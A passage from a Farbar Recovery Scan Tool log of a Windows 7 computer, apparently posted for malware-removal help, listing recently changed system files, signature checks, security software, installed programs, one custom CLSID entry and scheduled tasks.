2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 21:01 - 2011-11-26 19:42 - 01217324 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 20:44 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 20:01 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-02 20:01 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-02 20:00 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-02 19:57 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-11-02 19:57 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-11-02 19:54 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-02 19:54 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-02 19:54 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 17:49 - 2012-02-11 21:11 - 00000000 ____D () C:\Users\Deborah
2014-11-02 16:00 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-02 16:00 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-02 11:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-02 11:24 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-02 07:51 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-25 23:54

==================== End Of Log ============================

Additional Log:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 22:15:57
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version:  - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version:  - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA  (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net  (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System  (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports  (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display  (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll (Microsoft Corporation)

==================== Restore Points  =========================

03-11-2014 03:01:09 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
